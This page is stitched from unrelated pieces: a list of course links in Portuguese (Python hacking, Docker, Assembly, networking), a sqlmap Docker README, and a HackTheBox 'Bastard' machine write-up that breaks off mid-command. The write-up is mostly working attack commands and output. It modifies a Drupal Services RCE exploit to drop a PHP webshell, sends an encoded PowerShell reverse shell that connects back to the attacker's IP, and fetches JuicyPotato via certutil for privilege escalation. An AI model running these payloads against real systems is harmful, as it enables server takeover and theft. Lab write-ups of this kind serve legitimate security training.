Schafer](https://www.youtube.com/playlist?list=PL-osiE80TeTt2d9bfVyTiXJA-UTHn6WwU) - [Advanced Python - Complete Course](https://www.youtube.com/playlist?list=PLqnslRFeH2UqLwzS0AwKDKLrpYBKzLBy2) - [Python Tutorials for Absolute Beginners - CS Dojo](https://www.youtube.com/playlist?list=PLBZBJbE_rGRWeh5mIBhD-hhDwSEDxogDg) - [Learn Python The Complete Python Programming Course](https://www.youtube.com/playlist?list=PL0-4oWTgb_cl_FQ66HvBx0g5-LZjnLl8o) - [100 Days of Code - Learn Python Programming!](https://www.youtube.com/playlist?list=PLSzsOkUDsvdvGZ2fXGizY_Iz9j8-ZlLqh) - [Python (Full Course) - QAFox](https://www.youtube.com/playlist?list=PLsjUcU8CQXGGqjSvX8h5JQIymbYfzEMWd) - [Python Full Course - Jennys Lectures](https://www.youtube.com/playlist?list=PLdo5W4Nhv31bZSiqiOL5ta39vSnBxpOPT) - [Python Tutorials For Absolute Beginners In Hindi](https://www.youtube.com/playlist?list=PLu0W_9lII9agICnT8t4iYVSZ3eykIAOME) - [Crash Course on Python by Google](https://www.youtube.com/playlist?list=PLOkt5y4uV6bW46gR0DrBRfkVAhE6RSpZX) - [NetAcad Python Course Labs](https://www.youtube.com/playlist?list=PL6Tc4k6dl9kLk8cDwImy1Q6a9buJkvsEJ) - [Data Analysis with Python Course](https://www.youtube.com/playlist?list=PLWKjhJtqVAblvI1i46ScbKV2jH1gdL7VQ) - [30 day Basic to Advanced Python Course](https://www.youtube.com/playlist?list=PL3DVGRBD_QUrqjmkhf8cK038fiZhge7bu) - [Python Course - Masai](https://www.youtube.com/playlist?list=PLD6vB9VKZ11lm3iP5riJtgDDtDbd9Jq4Y) - [Python Hacking Course Beginner To Advance!](https://www.youtube.com/watch?v=Wfe1q7nx8WU&ab_channel=TheHackingCoach) - [Ethical Hacking using Python | Password Cracker Using Python | Edureka](https://www.youtube.com/watch?v=CV_mMAYzTxw&ab_channel=edureka%21) - [Complete Python Hacking Course: Beginner To Advance](https://www.youtube.com/watch?v=7T_xVBwFdJA&ab_channel=AleksaTamburkovski) - [Tools Write Python](https://www.youtube.com/playlist?list=PL0HkYwPRexOaRoD2jO6-0YFTTaED5Ya9A) - [Python 101 For Hackers](https://www.youtube.com/playlist?list=PLoqUKOWEFR1y6LQNkrssmO1-YN2gjniZY) - [Python for hackers course](https://www.youtube.com/playlist?list=PLFA5k60XteCmzAGxhfmauety1VbcUk9eh) - [Black Hat Python for Pentesters and Hackers tutorial](https://www.youtube.com/playlist?list=PLTgRMOcmRb3N5i5gBSjAqJ4c7m1CQDS0X) - [Python For Hackers](https://www.youtube.com/playlist?list=PLQzKQEJTLWfyyDGV_CQbPGTJn5apS10uN) - [The Complete Ethical Hacking Course Beginner to Advanced](https://www.youtube.com/playlist?list=PL0-4oWTgb_cniCsTF8hitbZL38NjFRyRr) - [Python Security - Abdallah Elsokary](https://www.youtube.com/playlist?list=PLCIJjtzQPZJ-k4ADq_kyuyWVSRPC5JxeG) - [Python Hacking - OccupyTheWeb](https://www.youtube.com/playlist?list=PLpJ5UHZQbpQvXbGzJHxjXH9Y7uxd-tnA7) - [Python For Hacking - Technical Hacker](https://www.youtube.com/playlist?list=PLb9t9VtleL9WTrk74L4xQIq6LM0ndQBEA) - [Hacking networks with Python and Scapy](https://www.youtube.com/playlist?list=PLhfrWIlLOoKOc3z424rgsej5P5AP8yNKR) - [Ethical Hacking With Python](https://www.youtube.com/playlist?list=PLHGPBKzD9DYU10VM6xcVoDSSVzt2MNdKf) - [Python hacking - Abdul Kamara](https://www.youtube.com/playlist?list=PLmrwFpxY0W1PPRPJrFAJInpOzuB3TLx0K) ## 🐋 Sites e cursos para aprender Docker > Cursos para aprender Docker em Português - [Curso de Docker Completo](https://www.youtube.com/playlist?list=PLg7nVxv7fa6dxsV1ftKI8FAm4YD6iZuI4) - [Curso de Docker para iniciantes](https://www.youtube.com/watch?v=np_vyd7QlXk&t=1s&ab_channel=MatheusBattisti-HoradeCodar) - [Curso de Introdução ao Docker](https://www.youtube.com/playlist?list=PLXzx948cNtr8N5zLNJNVYrvIG6hk0Kxl-) - [Curso Descomplicando o Docker - LINUXtips 2016](https://www.youtube.com/playlist?list=PLf-O3X2-mxDkiUH0r_BadgtELJ_qyrFJ_) - [Descomplicando o Docker - LINUXtips 2022](https://www.youtube.com/playlist?list=PLf-O3X2-mxDn1VpyU2q3fuI6YYeIWp5rR) - [Curso Docker - Jose Carlos Macoratti](https://www.youtube.com/playlist?list=PLJ4k1IC8GhW1kYcw5Fiy71cl-vfoVpqlV) - [Docker DCA - Caio Delgado](https://www.youtube.com/playlist?list=PL4ESbIHXST_TJ4TvoXezA0UssP1hYbP9_) - [Docker em 22 minutos - teoria e prática](https://www.youtube.com/watch?v=Kzcz-EVKBEQ&ab_channel=ProgramadoraBordo) - [Curso de Docker Completo - Cultura DevOps](https://www.youtube.com/playlist?list=PLdOotbFwzDIjPK7wcu4MBCZhm9Lj6mX11) > Cursos para aprender Docker em Inglês - [Runnable, Slash Docker](https://runnable.com/docker/) - [Docker, Docker 101 Tutorial](https://www.docker.com/101-tutorial/) - [Online IT Guru, Docker Tutorial](https://onlineitguru.com/docker-training) - [Tutorials Point, Docker Tutorial](https://www.tutorialspoint.com/docker/index.htm) - [Andrew Odewahn, Docker Jumpstart](https://odewahn.github.io/docker-jumpstart/) - [Romin Irani, Docker Tutorial Series](https://rominirani.com/docker-tutorial-series-a7e6ff90a023?gi=4504494d886a) - [LearnDocker Online](https://learndocker.online/) - [Noureddin Sadawi, Docker Training](https://www.youtube.com/playlist?list=PLea0WJq13cnDsF4MrbNaw3b4jI0GT9yKt) - [Learn2torials, Latest Docker Tutorials](https://learn2torials.com/category/docker) - [Docker Curriculum, Docker For Beginners](https://docker-curriculum.com/) - [Jake Wright, Learn Docker In 12 Minutes](https://www.youtube.com/watch?v=YFl2mCHdv24&ab_channel=JakeWright) - [Digital Ocean, How To Install And Use Docker](https://www.digitalocean.com/community/tutorial_collections/how-to-install-and-use-docker) - [LinuxTechLab, The Incomplete Guide To Docker](https://linuxtechlab.com/the-incomplete-guide-to-docker-for-linux/) - [Play With Docker Classroom, Play With Docker](https://training.play-with-docker.com/) - [Shota Jolbordi, Introduction to Docker](https://medium.com/free-code-camp/comprehensive-introductory-guide-to-docker-vms-and-containers-4e42a13ee103) - [Collabnix, The #1 Docker Tutorials, Docker Labs](https://dockerlabs.collabnix.com/) - [Servers For Hackers, Getting Started With Docker](https://serversforhackers.com/c/getting-started-with-docker) - [Dive Into Docker, The Complete Course](https://diveintodocker.com/) - [Hashnode, Docker Tutorial For Beginners](https://hashnode.com/post/docker-tutorial-for-beginners-cjrj2hg5001s2ufs1nker9he2) - [Docker Crash Course Tutorial](https://www.youtube.com/playlist?list=PL4cUxeGkcC9hxjeEtdHFNYMtCpjNBm3h7) - [Docker Tutorial for Beginners - freeCodeCamp](https://www.youtube.com/watch?v=fqMOX6JJhGo&ab_channel=freeCodeCamp.org) - [Docker Tutorial for Beginners - Programming with Mosh](https://www.youtube.com/watch?v=pTFZFxd4hOI&ab_channel=ProgrammingwithMosh) - [Docker Tutorial for Beginners Full Course in 3 Hours](https://www.youtube.com/watch?v=3c-iBn73dDE&ab_channel=TechWorldwithNana) - [Docker Tutorial for Beginners Full Course](https://www.youtube.com/watch?v=p28piYY_wv8&ab_channel=Amigoscode) ## 🐼 Sites e cursos para aprender Assembly > Cursos para aprender Assembly em Português - [Assembly na Prática](https://www.youtube.com/playlist?list=PLxTkH01AauxRm0LFLlOA9RR5O6hBLqBtC) - [Curso de Assembly com Snes e Mega Drive](https://www.youtube.com/playlist?list=PLLFRf_pkM7b6Vi0ehPPovl1gQ5ubHTy5P) - [Curso de Assembly para PIC](https://www.youtube.com/playlist?list=PLZ8dBTV2_5HQd6f4IaoO50L6oToxQMFYt) - [Minicurso Programação Assembly x86 MASM32](https://www.youtube.com/playlist?list=PLmKKLDrwQKd6iL3rXIbIowc4GWMgYh_iH) - [Minicurso: Linguagem Assembly 8086 no DEBUG](https://www.youtube.com/playlist?list=PL838IdaPZmcsxX3HwxFSkxm5S_-4wqcYp) - [Curso de Assembly - Minilord](https://www.youtube.com/playlist?list=PLhkvr9d5St4VmgSpGoeXcQamYl8vBiMeH) - [Papo binario - Assembly](https://www.youtube.com/playlist?list=PLWHiAJhsj4eXi1AF6N5MYz61RcwSCoVO8) > Cursos para aprender Assembly em Inglês - [Assembly Language Programming with ARM – Full Tutorial for Beginners](https://www.youtube.com/watch?v=gfmRrPjnEw4&ab_channel=freeCodeCamp.org) - [Modern x64 Assembly](https://www.youtube.com/playlist?list=PLKK11Ligqitg9MOX3-0tFT1Rmh3uJp7kA) - [Assembly Language Programming](https://www.youtube.com/playlist?list=PLPedo-T7QiNsIji329HyTzbKBuCAHwNFC) - [Intro to x86 Assembly Language](https://www.youtube.com/playlist?list=PLmxT2pVYo5LB5EzTPZGfFN0c2GDiSXgQe) - [x86 Assembly](https://www.youtube.com/playlist?list=PLan2CeTAw3pFOq5qc9urw8w7R-kvAT8Yb) ## 🦞 Sites e cursos para aprender Powershell > Cursos para aprender Powershell em Português - [PowerShell - Fundamentos](https://www.youtube.com/playlist?list=PLO_mlVzHgDw3EIKrT5rma_rmC4Lcc7ihT) - [Tutoriais de Windows PowerShell](https://www.youtube.com/playlist?list=PLucm8g_ezqNpdK1sHdiDC3T8VMANcT5WZ) - [PowerShell - ProfessorRamos](https://www.youtube.com/playlist?list=PL35Zp8zig6slB_EaLbwKP57L9weBfICtS) - [Curso Windows PowerShell - Bóson Treinamentos](https://www.youtube.com/playlist?list=PLs8UzdP13z6oEUoENIGkBQf1b2AtZcyoB) > Cursos para aprender Powershell em Espanhol - [Curso PowerShell 2022](https://www.youtube.com/playlist?list=PLn98b7UTDjb1h5_LCHXyeJR8nrPeTaSBM) - [Curso de PowerShell en Español](https://www.youtube.com/playlist?list=PLs3CpSZ8xiuS-qgB7SgrMoDaJcFY88EIA) > Cursos para aprender Powershell em Inglês - [PowerShell Master Class](https://www.youtube.com/playlist?list=PLlVtbbG169nFq_hR7FcMYg32xsSAObuq8) - [PowerShell For Beginners Full Course](https://www.youtube.com/watch?v=UVUd9_k9C6A&ab_channel=Nerd%27slesson) - [Powershell Advanced Tools and Scripting Full Course](https://www.youtube.com/watch?v=K4YDHFalAK8&ab_channel=Nerd%27slesson) - [PowerShell Master Class - PowerShell Fundamentals](https://www.youtube.com/watch?v=sQm4zRvvX58&ab_channel=JohnSavill%27sTechnicalTraining) ## 🖥️ Sites e cursos para aprender Hardware Hacking > Cursos para aprender Hardware Hacking em Português - [Hardware Hacking - Julio Dellafora](https://www.youtube.com/playlist?list=PLmuhNadVlssg1fkJsQ5m2-gkv6TuRiXsY) - [Hardware Hacking Tutorial](https://www.youtube.com/playlist?list=PLoFdAHrZtKkhcd9k8ZcR4th8Q8PNOx7iU) - [Hardware Hacking Series](https://www.youtube.com/playlist?list=PLRovDyowOn5GZBvMGBRxFG_UrpdfFV6t5) - [Hardware hacking - Binary Freaks](https://www.youtube.com/playlist?list=PLL8bstVVO1fCsO46wrpYvgNqXTcDIxy4P) - [Hardware hacking - Ahmed](https://www.youtube.com/playlist?list=PLgfYdF0GSWDLpqFuBELfXgihiyw069z1s) - [Hardware Hacking - Penegui](https://www.youtube.com/playlist?list=PLfka6izM9ttCfWU8cFSLw7nMp_X7E4m7T) - [Hardware Hacking - Security Society](https://www.youtube.com/playlist?list=PLtU1gNI5NZU4b0kgP0uXvYYvTq6AEynzQ) - [Hardware Hacking - Roadsec](https://www.youtube.com/playlist?list=PLGdaaZUNDlN6ntfjur2GZPyQiR6-bU2_e) - [Hardware Hacking - Playlist](https://www.youtube.com/playlist?list=PL8F1MJo6GRXJZwD8v2MWM14vbL2MMMizr) - [Hardware Hacking - Javier Velez](https://www.youtube.com/playlist?list=PL-CQR8Wgnim98elyQnO0q9C9jxau_La1F) - [Hardware Hacking - 0xff7](https://www.youtube.com/playlist?list=PLqrCc-ayMEJOjANuyGLVl_hkqar8tbgma) - [Hardware Hacking - Sprocket](https://www.youtube.com/playlist?list=PLuhHV1PfaffZWzvcdH8OoCFSak2j4ppcn) ## 📡 Sites e cursos para aprender Redes de Computadores > Cursos para aprender Redes de Computadores em Português - [Curso Redes de Computadores Grátis](https://www.youtube.com/playlist?list=PLHz_AreHm4dkd4lr9G0Up-W-YaHYdTDuP) - [Curso de Redes de Computadores](https://www.youtube.com/playlist?list=PLucm8g_ezqNpGh95n-OdEk06ity7YYfvU) - [Engenharia de Computação - Redes de Computadores - 14º Bimestre](https://www.youtube.com/playlist?list=PLxI8Can9yAHc-_dZ6nsfoon08i2-4OvEk) - [Curso Prático de Redes de Computadores](https://www.youtube.com/playlist?list=PLAp37wMSBouBnNup2tD-mC36JT96vHBZy) - [Curso de Redes de Computadores Básico Mão na massa](https://www.youtube.com/playlist?list=PL6BTdBqzl1oY9EQ4151rGNEbATMNgX8vK) - [Redes de Computadores - Fabricio Breve](https://www.youtube.com/playlist?list=PLvHXLbw-JSPfKp65psX5C9tyNLHHC4uoR) - [Fundamentos de Redes de Computadores](https://www.youtube.com/playlist?list=PL1ohpeRa0gZ8mY4oGrX1d-H9YZW_jTAxb) - [Redes de Computadores - TQSM](https://www.youtube.com/playlist?list=PL8lS5-l2_3ccLfD3-yu1Kw1Gw8G7CtNkS) - [Redes de Computadores - Canal TI](https://www.youtube.com/playlist?list=PLJR6Tybi2maQtNQElsxjUIm_d108Dd85c) - [Rede de Computadores na Prática](https://www.youtube.com/playlist?list=PL35Zp8zig6smwaEC0bIW8vnOYecDulS2-) > Cursos para aprender Redes de Computadores em Inglês - [Computer Networking Course - Network Engineering](https://www.youtube.com/watch?v=qiQR5rTSshw&ab_channel=freeCodeCamp.org) - [Computer Networks: Crash Course Computer Science](https://www.youtube.com/watch?v=3QhU9jd03a0&ab_channel=CrashCourse) - [Computer Networks - Neso Academy](https://www.youtube.com/playlist?list=PLBlnK6fEyqRgMCUAG0XRw78UA8qnv6jEx) ## 🎓 Certificações para Cyber Security - [Security Certification Roadmap](https://pauljerimy.com/security-certification-roadmap/) ![Logo](https://i.imgur.com/azUfcQp.png)
# sqlmap ## Official Documentation Reference: https://github.com/sqlmapproject/sqlmap ## Description **sqlmap** is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches including database fingerprinting, over data fetching from the database, accessing the underlying file system, and executing commands on the operating system via out-of-band connections. ## Usage ``` docker run -it --rm secsi/sqlmap -u "<target_url>" ``` ## 🐳 RAUDI: Regularly and Automatically Updated Docker Images Hello, friend. This Docker Image has been created by RAUDI. What is RAUDI? **RAUDI** (Regularly and Automatically Updated Docker Images) automatically generates and keep updated a series of *Docker Images* through *GitHub Actions* for tools that are not provided by the developers. **RAUDI** is what will save you from creating and managing a lot of Docker Images manually. Every time a software is updated you need to update the Docker Image if you want to use the latest features, the dependencies are not working anymore. This is messy and time-consuming. Don't worry anymore, we got you covered. If you want to contribute, give us a star or take a quick look at the source code of **RAUDI** click [here](https://github.com/cybersecsi/RAUDI).
# Bastard ## Introduction Welcome to my another writeup! In this HackTheBox [Bastard](https://app.hackthebox.com/machines/Bastard) machine, you'll learn: Exploiting Drupal 7.x Module Services RCE, privilege escalation via `SeImpersonatePrivilege`, and more! Without further ado, let's dive in. - Overall difficulty for me (From 1-10 stars): ★☆☆☆☆☆☆☆☆☆ ## Table of Content 1. **[Service Enumeration](#service-enumeration)** 2. **[Initial Foothold](#initial-foothold)** 3. **[Privilege Escalation: NT AUTHORITY\IUSR to NT AUTHORITY\SYSTEM](#privilege-escalation)** 4. **[Conclusion](#conclusion)** ## Background ![](https://github.com/siunam321/CTF-Writeups/blob/main/HackTheBox/Bastard/images/Bastard.png) ## Service Enumeration As usual, scan the machine for open ports via `rustscan` and `nmap`! **Rustscan:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:22:03(HKT)] └> export RHOSTS=10.10.10.9 ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:22:04(HKT)] └> rustscan --ulimit 5000 -b 4500 -t 2000 --range 1-65535 $RHOSTS -- -sC -sV -oN scanning/rustscan.txt [...] PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE | http-robots.txt: 36 disallowed entries | /includes/ /misc/ /modules/ /profiles/ /scripts/ | /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt | /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt | /LICENSE.txt /MAINTAINERS.txt /update.php /UPGRADE.txt /xmlrpc.php | /admin/ /comment/reply/ /filter/tips/ /node/add/ /search/ | /user/register/ /user/password/ /user/login/ /user/logout/ /?q=admin/ | /?q=comment/reply/ /?q=filter/tips/ /?q=node/add/ /?q=search/ |_/?q=user/password/ /?q=user/register/ /?q=user/login/ /?q=user/logout/ |_http-title: Welcome to Bastard | Bastard |_http-generator: Drupal 7 (http://drupal.org) |_http-server-header: Microsoft-IIS/7.5 |_http-favicon: Unknown favicon MD5: CF2445DCB53A031C02F9B57E2199BC03 135/tcp open msrpc syn-ack Microsoft Windows RPC 49154/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows ``` **`nmap` UDP scan:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:22:34(HKT)] └> sudo nmap -sU $RHOSTS -oN scanning/nmap-udp-top1000.txt [...] Not shown: 1000 open|filtered udp ports (no-response) ``` According to `rustscan` and `nmap` result, we have 3 ports are opened: |Open Port | Service | |:---: |:---: | |80/TCP | Microsoft IIS httpd 7.5 | |135/TCP, 49154/TCP| RPC | ### HTTP on TCP port 80 **Adding a new host to `/etc/hosts`:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:23:17(HKT)] └> echo "$RHOSTS bastard.htb" | sudo tee -a /etc/hosts 10.10.10.9 bastard.htb ``` **Home page:** ![](https://github.com/siunam321/CTF-Writeups/blob/main/HackTheBox/Bastard/images/Pasted%20image%2020230728152407.png) In here, we can see that **the web application is using [Drupal](https://www.drupal.org/)**, which is an open source CMS (Content Management System). ## Initial Foothold **According to the `/robots.txt` in `nmap`'s scripting scan, there's a `/CHANGELOG.txt` disallow entry:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:34:55(HKT)] └> curl http://bastard.htb/CHANGELOG.txt Drupal 7.54, 2017-02-01 ----------------------- [...] ``` We can confirmed that the Drupal version on the web application is **7.54**. **Hence, we can find public exploits for that version in `searchsploit`:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:36:03(HKT)] └> searchsploit drupal 7.x --------------------------------------------------------------------- --------------------------------- Exploit Title | Path --------------------------------------------------------------------- --------------------------------- Drupal 7.x Module Services - Remote Code Execution | php/webapps/41564.php [...] ``` **Looks like version 7.x is vulnerable to Remote Code Execution (RCE). Let's mirror `41564.php`:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:37:16(HKT)] └> searchsploit -m 41564 Exploit: Drupal 7.x Module Services - Remote Code Execution URL: https://www.exploit-db.com/exploits/41564 Path: /usr/share/exploitdb/exploits/php/webapps/41564.php Codes: N/A Verified: True File Type: C++ source, ASCII text Copied to: /home/siunam/ctf/htb/Machines/Bastard/41564.php ``` **41564.php:** ```php [...] # Drupal Services Module Remote Code Execution Exploit # https://www.ambionics.io/blog/drupal-services-module-rce # cf # # Three stages: # 1. Use the SQL Injection to get the contents of the cache for current endpoint # along with admin credentials and hash # 2. Alter the cache to allow us to write a file and do so # 3. Restore the cache # [...] ``` By reading the exploit code, it's not malicious to us, and trying to exploit SQL injection vulnerability to upload a PHP webshell. For more details about this vulnerability, you can read this blog post: [https://www.ambionics.io/blog/drupal-services-module-rce](https://www.ambionics.io/blog/drupal-services-module-rce) In that blog post, it mentioned: "The exploitation is completely stealth. Nevertheless, one has to ***guess or find the endpoint URL***, which mitigates the vulnerability a bit." **In the exploit code, it has variable `$endpoint_path`:** ```php $endpoint_path = '/rest_endpoint'; ``` **And when we go there, it responses "404 Not Found" HTTP status code:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:47:31(HKT)] └> httpx http://bastard.htb/rest_endpoint HTTP/1.1 404 Not Found [...] ``` To find the endpoint, we need to find Drupal's **module "Service" endpoint**. > [Services](https://www.drupal.org/project/services) is a _"standardized solution for building API's so that external clients can communicate with Drupal"_. Basically, it allows anybody to build SOAP, REST, or XMLRPC endpoints to send and fetch information in several output formats. It is currently the 150th most used plugin of Drupal, with around 45.000 active websites. > > Services allows you to create different endpoints with different resources, allowing you to interact with your website and its content in an API-oriented way. For instance, you can enable the `/user/login` resource to login via JSON or XML. (From the previously mentioned blog post) **To do so, we can use content discovery tools like `gobuster`:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|15:58:06(HKT)] └> gobuster dir -u http://bastard.htb/ -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -t 40 [...] /rest (Status: 200) [Size: 62] ``` **`/rest` looks promising:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|16:05:14(HKT)] └> curl http://bastard.htb/rest Services Endpoint "rest_endpoint" has been setup successfully. ``` **Nice, we found the module "Service" endpoint, let's modify variable `$endpoint_path`'s value:** ```php $endpoint_path = '/rest'; ``` **Before running the exploit, we also need to modify the `$url` variable:** ```php $url = 'http://bastard.htb'; ``` Moreover, we need to upload a PHP webshell via modifying the `$file` variable. **So, our final modified exploit code is:** ```php $url = 'http://bastard.htb'; $endpoint_path = '/rest'; $endpoint = 'rest_endpoint'; $file = [ 'filename' => 'webshell.php', 'data' => '<?php system($_GET["cmd"]); ?>' ]; ``` When the GET parameter `cmd` is provided in `webshell.php`, it'll execute system commands based on parameter `cmd`'s value. **Let's run it!** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|16:10:50(HKT)] └> php 41564.php # Exploit Title: Drupal 7.x Services Module Remote Code Execution # Vendor Homepage: https://www.drupal.org/project/services # Exploit Author: Charles FOL # Contact: https://twitter.com/ambionics # Website: https://www.ambionics.io/blog/drupal-services-module-rce #!/usr/bin/php Stored session information in session.json Stored user information in user.json Cache contains 7 entries File written: http://bastard.htb/webshell.php ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|16:12:53(HKT)] └> curl http://bastard.htb/webshell.php --get --data-urlencode "cmd=whoami" nt authority\iusr ``` Nice! We now can get a reverse shell! > Note: If you encountered `curl_init()` error, install `php-curl`: `sudo apt-get install php-curl`. - **Setup a netcat listener:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|16:13:38(HKT)] └> rlwrap -cAr nc -lvnp 443 listening on [any] 443 ... ``` - **Send a reverse shell payload:** (Generated from [revshells.com](https://www.revshells.com/)) ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|16:21:23(HKT)] └> curl http://bastard.htb/webshell.php --get --data-urlencode "cmd=powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4AOAAiACwANAA0ADMAKQA7ACQAcwB0AHIAZQBhAG0AIAA9ACAAJABjAGwAaQBlAG4AdAAuAEcAZQB0AFMAdAByAGUAYQBtACgAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAGIAeQB0AGUAcwAgAD0AIAAwAC4ALgA2ADUANQAzADUAfAAlAHsAMAB9ADsAdwBoAGkAbABlACgAKAAkAGkAIAA9ACAAJABzAHQAcgBlAGEAbQAuAFIAZQBhAGQAKAAkAGIAeQB0AGUAcwAsACAAMAAsACAAJABiAHkAdABlAHMALgBMAGUAbgBnAHQAaAApACkAIAAtAG4AZQAgADAAKQB7ADsAJABkAGEAdABhACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAC0AVAB5AHAAZQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4AQQBTAEMASQBJAEUAbgBjAG8AZABpAG4AZwApAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGIAeQB0AGUAcwAsADAALAAgACQAaQApADsAJABzAGUAbgBkAGIAYQBjAGsAIAA9ACAAKABpAGUAeAAgACQAZABhAHQAYQAgADIAPgAmADEAIAB8ACAATwB1AHQALQBTAHQAcgBpAG4AZwAgACkAOwAkAHMAZQBuAGQAYgBhAGMAawAyACAAPQAgACQAcwBlAG4AZABiAGEAYwBrACAAKwAgACIAUABTACAAIgAgACsAIAAoAHAAdwBkACkALgBQAGEAdABoACAAKwAgACIAPgAgACIAOwAkAHMAZQBuAGQAYgB5AHQAZQAgAD0AIAAoAFsAdABlAHgAdAAuAGUAbgBjAG8AZABpAG4AZwBdADoAOgBBAFMAQwBJAEkAKQAuAEcAZQB0AEIAeQB0AGUAcwAoACQAcwBlAG4AZABiAGEAYwBrADIAKQA7ACQAcwB0AHIAZQBhAG0ALgBXAHIAaQB0AGUAKAAkAHMAZQBuAGQAYgB5AHQAZQAsADAALAAkAHMAZQBuAGQAYgB5AHQAZQAuAEwAZQBuAGcAdABoACkAOwAkAHMAdAByAGUAYQBtAC4ARgBsAHUAcwBoACgAKQB9ADsAJABjAGwAaQBlAG4AdAAuAEMAbABvAHMAZQAoACkA" ``` - **Profit:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|16:13:38(HKT)] └> rlwrap -cAr nc -lvnp 443 listening on [any] 443 ... connect to [10.10.14.8] from (UNKNOWN) [10.10.10.9] 62693 PS C:\inetpub\drupal-7.54> whoami; ipconfig /all nt authority\iusr Windows IP Configuration Host Name . . . . . . . . . . . . : Bastard Primary Dns Suffix . . . . . . . : Node Type . . . . . . . . . . . . : Hybrid IP Routing Enabled. . . . . . . . : No WINS Proxy Enabled. . . . . . . . : No Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection Physical Address. . . . . . . . . : 00-50-56-B9-7B-84 DHCP Enabled. . . . . . . . . . . : No Autoconfiguration Enabled . . . . : Yes IPv4 Address. . . . . . . . . . . : 10.10.10.9(Preferred) Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . : 10.10.10.2 DNS Servers . . . . . . . . . . . : 10.10.10.2 NetBIOS over Tcpip. . . . . . . . : Enabled [...] ``` I'm user `nt authority\iusr`! **user.txt:** ```shell PS C:\Users\dimitris\Desktop> type user.txt {Redacted} ``` ## Privilege Escalation ### NT AUTHORITY\IUSR to NT AUTHORITY\SYSTEM **System information:** ```shell PS C:\Users\dimitris\Desktop> systeminfo Host Name: BASTARD OS Name: Microsoft Windows Server 2008 R2 Datacenter OS Version: 6.1.7600 N/A Build 7600 [...] System Type: x64-based PC ``` - Windows version: **Windows Server 2008 R2 Build 7600** This version is quite old, maybe we can leverage Kernel Exploits (KE) to escalate our privilege to SYSTEM. **`nt authority\iusr` user privilege:** ```shell PS C:\Users\dimitris\Desktop> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ======================= ========================================= ======= SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled ``` As expected, since `nt authority\iusr` is a service account (`AppPool`), **it should have `SeImpersonatePrivilege`.** Armed with above information, we can use "**Potato**" like exploit that abuses `SeImpersonatePrivilege` to escalate our service account's privilege to SYSTEM. Since the the Windows version is quite old (Windows Server 2008), we can use **"[Juicy Potato](https://github.com/ohpe/juicy-potato)"**. (Based on [https://jlajara.gitlab.io/Potatoes_Windows_Privesc#tldr](https://jlajara.gitlab.io/Potatoes_Windows_Privesc)) - **Transfer [JuicyPotato.exe](https://github.com/ohpe/juicy-potato/releases/tag/v0.1) to the target machine:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|17:03:01(HKT)] └> file /opt/juicy-potato/JuicyPotato.exe /opt/juicy-potato/JuicyPotato.exe: PE32+ executable (console) x86-64, for MS Windows, 7 sections ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|17:03:12(HKT)] └> python3 -m http.server -d /opt/juicy-potato/ 80 Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ... ``` ```shell PS C:\inetpub\drupal-7.54> certutil -urlcache -split -f http://10.10.14.15/JuicyPotato.exe [...] PS C:\inetpub\drupal-7.54> .\JuicyPotato.exe JuicyPotato v0.1 Mandatory args: -t createprocess call: <t> CreateProcessWithTokenW, <u> CreateProcessAsUser, <*> try both -p <program>: program to launch -l <port>: COM server listen port [...] ``` - **Setup a netcat listener:** ```shell ┌[siunam♥Mercury]-(~/ctf/htb/Machines/Bastard)-[2023.07.28|17:07:03(HKT)] └> rlwrap -cAr nc -lvnp 53 listening on [any] 53 ... ``` - **Verify the exploit is working or not:** ```shell PS 